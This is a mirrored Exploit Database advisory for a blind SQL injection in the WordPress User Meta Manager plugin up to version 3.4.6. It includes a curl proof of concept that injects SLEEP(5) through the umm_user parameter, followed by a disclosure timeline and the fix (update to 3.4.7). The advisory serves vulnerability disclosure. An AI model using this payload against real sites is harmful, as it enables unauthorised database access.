WordPress Plugin User Meta Manager 3.4.6 – Blind SQL Injection

• Exploit Database
• 114 阅读

• 作者： Panagiotis Vagenas
  日期： 2016-02-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39410/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43

  * Exploit Title: WordPress User Meta Manager Plugin [Blind SQLI] * Discovery Date: 2015/12/28 * Public Disclosure Date: 2016/02/04 * Exploit Author: Panagiotis Vagenas * Contact: https://twitter.com/panVagenas * Vendor Homepage: http://jasonlau.biz/home/ * Software Link: https://wordpress.org/plugins/user-meta-manager/ * Version: 3.4.6 * Tested on: WordPress 4.4.1 * Category: webapps   Description ================================================================================   AJAX actions <code>umm_edit_user_meta</code> and <code>umm_delete_user_meta</code> of the User Meta Manager for WordPress plugin up to v3.4.6 are vulnerable to blind SQL injection attacks. A registered user can pass arbitrary MySQL commands to <code>umm_user</code> GET param.   PoC ================================================================================     curl -c ${USER_COOKIES} \ "http://${VULN_SITE}/wp-admin/admin-ajax.php\?action=umm_switch_action\ &umm_sub_action=[umm_delete_user_meta|umm_edit_user_meta]&umm_user=SLEEP(5)"     Timeline ================================================================================   2015/12/28 - Discovered 2015/12/29 - Vendor notified via support forums in WordPress.org 2015/12/29 - Vendor notified via contact form in his site 2016/01/29 - WordPress security team notified about the issue 2016/02/02 - Vendor released version 3.4.7 2016/02/02 - Verified that this exploit no longer applies in version 3.4.7   Solution ================================================================================   Update to version 3.4.7